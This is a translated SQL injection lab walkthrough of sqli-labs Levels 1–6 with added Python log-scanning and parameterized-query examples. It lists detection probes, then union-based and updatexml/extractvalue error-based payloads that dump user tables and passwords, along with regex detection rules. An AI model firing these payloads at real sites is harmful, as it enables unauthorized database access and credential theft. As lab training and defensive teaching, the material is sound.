• SQL injection, hands-on part, 2020-04-07


    Detecting SQL injection points:

    1. Single-quote test

    http://localhost/sqli/Less-1/?id=1'  if an error message appears, the site may have an injection vulnerability

    2. and test

    http://localhost/sqli/Less-1/?id=1' and 1=1--+  this condition is always true, so the normal page is returned

    http://localhost/sqli/Less-1/?id=1' and 1=2--+  if this returns an error, there is an injection vulnerability; still look at which error is reported, since not every error means injection

    3. OR test (this works the other way round from the and test: with and, the injection point shows when the request returns an error, while with OR it shows when the request returns normally)

    http://localhost/sqli/Less-1/?id=1' or 1=1--+

    http://localhost/sqli/Less-1/?id=1' or 1=2--+

    Both requests return normally, which demonstrates an injection point.

    4. xor test (if the condition after xor is true the error page is returned, and if it is false the normal page is returned; either way this indicates an injection point)

    http://localhost/sqli/Less-1/?id=1' xor 1=1--+ #error page returned, injection point exists

    http://localhost/sqli/Less-1/?id=1' xor 1=2--+ #normal page returned, injection point exists

    5. Arithmetic test (if the page returned is the same as the previous one, and adding -1 then returns the error page, that also indicates an injection vulnerability)

    http://localhost/sqli/Less-2/?id=10-0 #normal

    http://localhost/sqli/Less-2/?id=10-1 #normal

    http://localhost/sqli/Less-2/?id=10+1 #error

    6. Input-box test

    Special characters can be used for the test

    #@!$/...

    Login-form injection: using @ and -- had no effect, but an error came back; at that point I ran sqlmap and found it was injectable.
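As an added example (not code from the original post or from sqli-labs), here is a small Python scanner that applies the six probe shapes above from the defender's side: it URL-decodes each request parameter found in constructed access-log lines and tags the values that look like the quote, and/or/xor, comment, arithmetic, union and error-function probes. The log lines, rule names and output fields are constructed for this example. The decoding is the same one the web server performs, so `--+` arrives at the application as `-- ` and a plus sign in `10+1` arrives as a space; only `%2B` is a literal plus.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Constructed sample access log (not the lab's real log). The request paths
# reproduce the probe shapes from the section above, as a browser would send them.
SAMPLE_LOG = """\
10.0.0.5 - - [07/Apr/2020:10:00:01 +0800] "GET /sqli/Less-1/?id=1 HTTP/1.1" 200 512
10.0.0.5 - - [07/Apr/2020:10:00:02 +0800] "GET /sqli/Less-1/?id=1' HTTP/1.1" 200 611
10.0.0.5 - - [07/Apr/2020:10:00:03 +0800] "GET /sqli/Less-1/?id=1'%20and%201=1--+ HTTP/1.1" 200 512
10.0.0.5 - - [07/Apr/2020:10:00:04 +0800] "GET /sqli/Less-1/?id=1'%20xor%201=2--+ HTTP/1.1" 200 512
10.0.0.5 - - [07/Apr/2020:10:00:05 +0800] "GET /sqli/Less-2/?id=10-1 HTTP/1.1" 200 512
10.0.0.5 - - [07/Apr/2020:10:00:06 +0800] "GET /sqli/Less-2/?id=10%2B1 HTTP/1.1" 200 611
10.0.0.5 - - [07/Apr/2020:10:00:07 +0800] "GET /sqli/Less-5/?id=1'%20union%20select%201,updatexml(1,0x7e,1),3--+ HTTP/1.1" 200 611
10.0.0.6 - - [07/Apr/2020:10:00:08 +0800] "GET /news/?id=42&page=2 HTTP/1.1" 200 900
"""

# Common log format: client, identity, user, [timestamp], "request line", status, size.
LOG_RE = re.compile(
    r'^(?P<client>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+" (?P<status>\d{3}) (?P<size>\d+)'
)

# Each rule is applied to the *decoded* parameter value. Rule names are ours.
PROBE_RULES = [
    ("quote",       re.compile(r"['\"]")),                                  # 1. stray quote
    ("comment",     re.compile(r"--(\s|$)|/\*|#")),                          # the --+ / -- tail
    ("boolean",     re.compile(r"\b(and|or|xor)\s+\d+\s*=\s*\d+", re.I)),  # 2-4. and/or/xor N=N
    ("arithmetic",  re.compile(r"^\s*\d+\s*[-+]\s*\d+\s*$")),               # 5. 10-1, 10+1
    ("union",       re.compile(r"\bunion\s+(all\s+)?select\b", re.I)),       # union-based reads
    ("error_based", re.compile(r"\b(updatexml|extractvalue)\s*\(", re.I)),  # XPath error functions
]


def classify_value(value):
    """Return the names of every probe rule matching one decoded parameter value."""
    return tuple(name for name, rx in PROBE_RULES if rx.search(value))


def scan_log(text):
    """Parse access-log lines and report each parameter that matches at least one rule."""
    findings = []
    for line_no, line in enumerate(text.splitlines(), start=1):
        m = LOG_RE.match(line)
        if not m:
            continue  # not a request line we understand; skip rather than guess
        query = urlsplit(m.group("target")).query
        # parse_qsl decodes %xx sequences and turns '+' into a space, like the server does
        for param, value in parse_qsl(query, keep_blank_values=True):
            tags = classify_value(value)
            if tags:
                findings.append({"line": line_no, "client": m.group("client"),
                                 "param": param, "value": value, "tags": tags})
    return findings


if __name__ == "__main__":
    for f in scan_log(SAMPLE_LOG):
        print(f"line {f['line']:>2} {f['client']:<10} {f['param']}={f['value']!r:<55} {', '.join(f['tags'])}")
```

The baseline requests on lines 1 and 8 produce no findings; the rest are tagged by the probe shape they match. A production rule set would also want to count repeated hits per client and per parameter, since a single quote in a value is a weak signal on its own while the and/xor/union sequence in quick succession is not.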

     

    Level 1  (' single-quote closing)

    http://localhost/sqli/Less-1/

    http://localhost/sqli/Less-1/?id=1'  database error, so there is an injection point here

    http://localhost/sqli/Less-1/?id=1' order by 3--+  determine how many columns there are

    http://localhost/sqli/Less-1/?id=-1' union select 1,2,3--+  union injection begins

    http://localhost/sqli/Less-1/?id=-1' union select 1,database(),3--+  database name is security

    http://localhost/sqli/Less-1/?id=-1' union select 1,group_concat(table_name),3 from information_schema.tables  where table_schema=database()--+  get table name users

    http://localhost/sqli/Less-1/?id=-1' union select 1,group_concat(column_name),3 from information_schema.columns  where table_name='users'--+  get table columns username,password

    http://localhost/sqli/Less-1/?id=-1' union select 1,group_concat(username,'|',password),3 from users--+  usernames and passwords

    Level 2  (numeric parameter, no closing needed)

    http://localhost/sqli/Less-2

    http://127.0.0.1/sqli/Less-2/?id=1' #database error, there is an injection point here

    http://127.0.0.1/sqli/Less-2/?id=1 order by 3--+ #column count is 3

    http://127.0.0.1/sqli/Less-2/?id=-1 union select 1,2,3--+ #union injection

    http://127.0.0.1/sqli/Less-2/?id=-1 union select 1,database(),3--+ #database is security

    http://127.0.0.1/sqli/Less-2/?id=-1 union select 1,group_concat(table_name),3 from information_schema.tables where table_schema=database()--+ #table name is users

    http://127.0.0.1/sqli/Less-2/?id=-1 union select 1,group_concat(column_name),3 from information_schema.columns where table_name='users'--+ #get the table's columns

    http://127.0.0.1/sqli/Less-2/?id=-1 union select 1,group_concat(password,'~',username),3 from users--+ #usernames and passwords

    Level 3  (') single quote plus parenthesis closing)

    http://localhost/sqli/Less-3

    http://localhost/sqli/Less-3/?id=1' #error message shown, try ') as the closing

    http://localhost/sqli/Less-3/?id=1') and 1=1--+ #no error, closing succeeded

    http://localhost/sqli/Less-3/?id=-1') order by 3--+ #column count is 3

    http://localhost/sqli/Less-3/?id=-1') union select 1,database(),3--+ #database security

    http://localhost/sqli/Less-3/?id=-1') union select 1,group_concat(table_name),3 from information_schema.tables where table_schema=database()--+ #table users

    http://localhost/sqli/Less-3/?id=-1') union select 1,group_concat(column_name),3 from information_schema.columns where table_name='users'--+ #table columns username and password

    http://localhost/sqli/Less-3/?id=-1') union select 1,group_concat(username,'~',password),3 from users--+ #usernames and passwords

    Level 4  (") double quote plus parenthesis closing)

    http://localhost/sqli/Less-4

    http://localhost/sqli/Less-4/?id=1%27  #no error message with a single quote

    http://localhost/sqli/Less-4?id=1"  #error message shown, confirming the query is quoted with double quotes

    You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '"1"") LIMIT 0,1' at line 1

    http://localhost/sqli/Less-4?id=1"--+  #build a correct closing

    You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '' at line 1

    http://localhost/sqli/Less-4?id=1")--+  #returns normally, closing succeeded

    http://localhost/sqli/Less-4?id=1") order by 3--+  #column count is 3

    http://localhost/sqli/Less-4?id=-1") union select 1,database(),3--+  #database security

    http://localhost/sqli/Less-4?id=-1") union select 1,group_concat("<br/>",table_name),3 from information_schema.tables where table_schema=database()--+  #table users

    http://localhost/sqli/Less-4?id=-1") union select 1,group_concat("<br/>",column_name),3 from information_schema.columns where table_name='users'--+  #users table columns username,password

    http://localhost/sqli/Less-4?id=-1") union select 1,group_concat("<br/>",username,"~",password),3 from users--+  #usernames and passwords from the users table

    Level 5  (' single-quote closing && updatexml error-based injection)

    http://localhost/sqli/Less-5

    http://localhost/sqli/Less-5/?id=1'  #error, so the single quote is clearly the key

    http://localhost/sqli/Less-5/?id=1' order by 3--+  #order by shows the column count is 3

    http://localhost/sqli/Less-5/?id=1' union select 1,(updatexml(1,concat(0x7e,(select database()),0x7e),1)),3--+  #database security

    http://localhost/sqli/Less-5/?id=1' union select 1,(updatexml(1,concat(0x7e,(select table_name from information_schema.tables where table_schema=database() limit 3,1),0x7e),1)),3--+  #table users

    http://localhost/sqli/Less-5/?id=1' union select 1,(updatexml(1,concat(0x7e,(select column_name from information_schema.columns where table_name='users' limit 4,1),0x7e),1)),3--+  #column password

    http://localhost/sqli/Less-5/?id=1' union select 1,(updatexml(1,concat(0x7e,(select column_name from information_schema.columns where table_name='users' limit 7,1),0x7e),1)),3--+  #column username

    http://localhost/sqli/Less-5/?id=1' union select 1,(updatexml(1,concat(0x7e,(select username from users limit 0,1),0x7e),1)),3--+  #username Dumb

    http://localhost/sqli/Less-5/?id=1' union select 1,(updatexml(1,concat(0x7e,(select password from users limit 0,1),0x7e),1)),3--+  #password Dumb

    Level 6  (" double-quote closing && extractvalue error-based injection)

    http://localhost/sqli/Less-6

    http://localhost/sqli/Less-6/?id=6"--+ #the double quote is clearly the closing

    http://localhost/sqli/Less-6/?id=6" order by 3--+ #column count is 3

    http://localhost/sqli/Less-6/?id=6" union select 1,(extractvalue(1,concat(0x7e,(select database()),0x7e))),3--+ #database security

    http://localhost/sqli/Less-6/?id=6" union select 1,(extractvalue(1,concat(0x7e,(select table_name from information_schema.tables where table_schema='security' limit 3,1),0x7e))),3--+ #table users

    http://localhost/sqli/Less-6/?id=6" union select 1,(extractvalue(1,concat(0x7e,(select column_name from information_schema.columns where table_name='users' limit 4,1),0x7e))),3--+ #table column password

    http://localhost/sqli/Less-6/?id=6" union select 1,(extractvalue(1,concat(0x7e,(select column_name from information_schema.columns where table_name='users' limit 7,1),0x7e))),3--+ #table column username

    http://localhost/sqli/Less-6/?id=6" union select 1,(extractvalue(1,concat(0x7e,(select username from users limit 7,1),0x7e))),3--+ #username admin

    http://localhost/sqli/Less-6/?id=6" union select 1,(extractvalue(1,concat(0x7e,(select password from users limit 7,1),0x7e))),3--+ #password admin
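Levels 1 to 6 share one root cause: the id value is spliced into the SQL text, and in Levels 5 and 6 the database's own error message is echoed back to the browser, which is exactly what the updatexml/extractvalue technique depends on. The following is an added example, not code from sqli-labs or from the original post. It rebuilds that vulnerable pattern over an in-memory SQLite table with constructed sample rows (the query shape `WHERE id='...' LIMIT 0,1` is assumed from the error text quoted in Level 4), runs the walkthrough's own probes against it, and runs the same inputs against a parameterized query that logs driver errors server-side and returns a generic page. SQLite has no updatexml/extractvalue, so the error-based levels are represented by the verbose-error path, and SQLite's error texts differ from MySQL's.

```python
import sqlite3

GENERIC_ERROR = "Something went wrong. Please try again later."


def make_db():
    """Constructed in-memory stand-in for the lab's users table (sample rows, not the lab's dump)."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (id INTEGER, username TEXT, password TEXT)")
    conn.executemany("INSERT INTO users VALUES (?, ?, ?)",
                     [(1, "Dumb", "Dumb"), (2, "Angelina", "I-kill-you"), (8, "admin", "admin")])
    return conn


def page_vulnerable(conn, user_id):
    """The lab's pattern: input concatenated into the SQL text, raw driver error echoed to the client."""
    sql = f"SELECT id, username, password FROM users WHERE id='{user_id}' LIMIT 0,1"
    try:
        row = conn.execute(sql).fetchone()
    except sqlite3.Error as exc:
        return {"status": "error", "body": str(exc)}  # verbose error reaches the browser
    return {"status": "ok", "body": row}


def page_hardened(conn, user_id, audit_log):
    """Parameterized query: the input is bound as a value and never parsed as SQL.
    Driver errors go to a server-side log; the client only ever sees GENERIC_ERROR."""
    sql = "SELECT id, username, password FROM users WHERE id=? LIMIT 0,1"
    try:
        row = conn.execute(sql, (user_id,)).fetchone()
    except sqlite3.Error as exc:
        audit_log.append(f"db error for id={user_id!r}: {exc}")
        return {"status": "error", "body": GENERIC_ERROR}
    return {"status": "ok", "body": row}


def outcome(result):
    """Collapse a page result to the three states the walkthrough distinguishes."""
    if result["status"] == "error":
        return "error"
    return "row" if result["body"] is not None else "empty"


# The walkthrough's probes after URL decoding ('--+' becomes '-- ').
# The union payload uses SQLite's || and group_concat in place of MySQL's concat/group_concat.
PROBES = {
    "baseline":  "1",
    "quote":     "1'",
    "and_true":  "1' and 1=1-- ",
    "and_false": "1' and 1=2-- ",
    "orderby_4": "1' order by 4-- ",
    "union":     "-1' union select 1,group_concat(username||'|'||password),3 from users-- ",
}


def compare(probes=PROBES):
    """Run every probe through both pages; returns {name: (vulnerable outcome, hardened outcome)}."""
    conn = make_db()
    audit = []
    return {name: (outcome(page_vulnerable(conn, p)), outcome(page_hardened(conn, p, audit)))
            for name, p in probes.items()}


if __name__ == "__main__":
    for name, (vuln, hard) in compare().items():
        print(f"{name:<10} vulnerable={vuln:<6} hardened={hard}")
    print(page_vulnerable(make_db(), PROBES["union"])["body"])
```

Against the concatenating page the probes behave as the walkthrough describes: the bare quote and `order by 4` produce a driver error, `and 1=1` returns the row while `and 1=2` returns nothing, and the union payload returns every username and password in one field. Against the parameterized page every probe is just a string that matches no id, so the response is the same empty page each time and the audit log stays empty; there is no error text for an error-based technique to carry data in.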

    Level 7

    http://localhost/sqli/Less-7

  • Original article: https://www.cnblogs.com/llcn/p/12654146.html